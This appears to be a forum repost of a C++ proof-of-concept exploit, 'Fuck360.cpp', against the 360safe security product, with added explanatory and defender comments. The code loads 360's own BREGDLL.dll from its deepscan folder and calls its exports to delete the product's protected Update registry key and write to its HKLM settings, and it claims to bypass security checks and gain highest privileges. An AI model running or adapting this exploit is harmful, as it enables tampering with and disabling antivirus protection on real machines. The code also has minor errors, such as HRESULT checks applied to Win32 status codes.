很邪惡的代碼,有興趣的看看~~~
//////////////////////////////////////////////////////////////////////////<br />// Fuck360.cpp: source code is for study and exchange only; please do not attempt illegal use!<br />#include <windows.h><br />/* Function-pointer types for the five exports that InitBRegDll() resolves from BREGDLL.dll. */ typedef BOOL (WINAPI *INIT_REG_ENGINE)();<br />typedef LONG (WINAPI *BREG_DELETE_KEY)(HKEY hKey, LPCSTR lpSubKey);<br />typedef LONG (WINAPI *BREG_OPEN_KEY)(HKEY hKey, LPCSTR lpSubKey, PHKEY phkResult);<br />typedef LONG (WINAPI *BREG_CLOSE_KEY)(HKEY hKey);<br />typedef LONG (WINAPI *REG_SET_VALUE_EX)(HKEY hKey, LPCSTR lpValueName, DWORD Reserved, DWORD dwType, const BYTE* lpData, DWORD cbData);<br />/* Resolved export pointers; they stay NULL until InitBRegDll() assigns them. */ BREG_DELETE_KEYBRegDeleteKey = NULL;<br />BREG_OPEN_KEYBRegOpenKey = NULL;<br />BREG_CLOSE_KEYBRegCloseKey = NULL;<br />REG_SET_VALUE_EXBRegSetValueEx = NULL;<br />/* App Paths entry whose "Path" value is read to locate the 360safe install directory. */ #define AppPath"Software//Microsoft//Windows//CurrentVersion//App Paths//360safe.exe"<br />/* Root key and subkey handed to BRegDeleteKey in main(). */ #define TestDeleteKeyHKEY_LOCAL_MACHINE<br />#define TestDeleteRegPath"Software//360Safe//Update"<br />/* Root key and subkey opened and written by TestSetRegKey(). */ #define TestSetKeyHKEY_LOCAL_MACHINE<br />#define TestSetPath"Software//360Safe"<br />/* InitBRegDll: reads the "Path" value under AppPath, appends the deepscan DLL name, loads that DLL with LoadLibraryA and resolves InitRegEngine plus the four BReg exports into the globals above. Returns TRUE only when every export resolves and InitRegEngine() returns nonzero; on either of those two failures the module is freed first. On success the module is left loaded, and the global pointers refer into it. Defender note: what this leaves observable is a process other than the product itself loading BREGDLL.dll from the product's deepscan directory. */ BOOL InitBRegDll()<br />{<br />LONG lResult;<br />HKEY hKey;</p><p>/* Zero-filled buffer; the query below is capped at MAX_PATH bytes, so the extra 32 bytes leave room for the suffix appended with strcat. */ CHAR cPath[MAX_PATH + 32] = { 0 };<br />DWORD dwPathLen = MAX_PATH;</p><p>lResult = RegOpenKeyA(HKEY_LOCAL_MACHINE, AppPath, &hKey);<br />/* NOTE(review): FAILED() is the HRESULT test (value below zero). RegOpenKeyA and RegQueryValueExA return Win32 LONG status codes, where ERROR_SUCCESS is 0 and errors are nonzero, so the usual check is a comparison with ERROR_SUCCESS. */ if (FAILED(lResult))<br />return FALSE;</p><p>DWORD dwType = REG_SZ;<br />lResult = RegQueryValueExA(hKey, "Path", NULL, &dwType, (LPBYTE)cPath, &dwPathLen);<br />RegCloseKey(hKey);<br />if (FAILED(lResult))<br />return FALSE;</p><p>strcat(cPath, "//deepscan//BREGDLL.dll");<br />/* The DLL path is built entirely from a registry value; nothing visible here verifies the file before it is loaded. */ HMODULE modBReg = LoadLibraryA(cPath);<br />if (!modBReg)<br />return FALSE;<br />INIT_REG_ENGINE InitRegEngine = (INIT_REG_ENGINE)GetProcAddress(modBReg, "InitRegEngine");<br />BRegDeleteKey = (BREG_DELETE_KEY)GetProcAddress(modBReg, "BRegDeleteKey");<br />BRegOpenKey = (BREG_OPEN_KEY)GetProcAddress(modBReg, "BRegOpenKey");<br />BRegCloseKey = (BREG_CLOSE_KEY)GetProcAddress(modBReg, "BRegCloseKey");<br />BRegSetValueEx = (REG_SET_VALUE_EX)GetProcAddress(modBReg, "BRegSetValueEx");</p><p>/* Unload and give up if any of the five exports is missing. */ if (!InitRegEngine || 
!BRegDeleteKey || !BRegOpenKey || !BRegCloseKey || !BRegSetValueEx) {<br />FreeLibrary(modBReg);<br />return FALSE;<br />}</p><p>/* The DLL's own initialiser has to report success before the other exports are used. */ if (!InitRegEngine()) {<br />FreeLibrary(modBReg);<br />return FALSE;<br />}</p><p>return TRUE;<br />}<br />/* TestSetRegKey: opens TestSetPath under TestSetKey through BRegOpenKey, writes the REG_SZ string "TEST VALUE" (terminator included, because the length is sizeof) through BRegSetValueEx, closes the handle with BRegCloseKey and returns the result of the set call. The value name passed is the same TestSetPath string that names the key. Returns the open call's result instead when FAILED() flags it. */ LONG TestSetRegKey()<br />{<br />HKEY hKey;<br />LONG lResult;</p><p>lResult = BRegOpenKey(TestSetKey, TestSetPath, &hKey);<br />if (FAILED(lResult))<br />return lResult;</p><p>DWORD dwType = REG_SZ;<br />static char szData[] = "TEST VALUE";<br />lResult = BRegSetValueEx(hKey, TestSetPath, NULL, dwType, (const BYTE *)&szData, (DWORD)sizeof(szData));<br />BRegCloseKey(hKey);</p><p>return lResult;<br />}<br />/* main: exit code 1 when InitBRegDll() fails, 2 when the BRegDeleteKey call is flagged as failed, 3 when TestSetRegKey() is, 0 otherwise. Each outcome is announced with a message box; the three failure texts read "BReg initialisation failed!", "Key deletion failed!" and "Setting the key value failed!". argc and argv are unused. */ int main(int argc, char *argv[])<br />{<br />if (!InitBRegDll()) {<br />MessageBoxA(NULL, "初始化BReg失敗!", "失敗", MB_ICONSTOP);<br />return 1;</p><p>}<br />/* Deletes the TestDeleteRegPath subkey through the DLL's export. */ if (FAILED(BRegDeleteKey(TestDeleteKey, TestDeleteRegPath))) {<br />MessageBoxA(NULL, "索引值刪除失敗!", "失敗", MB_ICONSTOP);<br />return 2;</p><p>}</p><p>if (FAILED(TestSetRegKey())) {<br />MessageBoxA(NULL, "設定索引值失敗!", "失敗", MB_ICONSTOP);<br />return 3;<br />}</p><p>/* The success text reads "Bypassed the system security check, obtained the highest privileges, exploit succeeded!"; the visible code demonstrates only the one subkey deletion and the one value write above. Defender note: deletions or writes under the Software 360Safe key of HKEY_LOCAL_MACHINE that come from an unexpected process are the artefact to look for. */ MessageBoxA(NULL, "突破系統安全檢查,獲得最高許可權,漏洞利用成功!", "成功", MB_OK);<br />return 0;<br />}
相關連結:http://www.sebug.net/exploit/19048/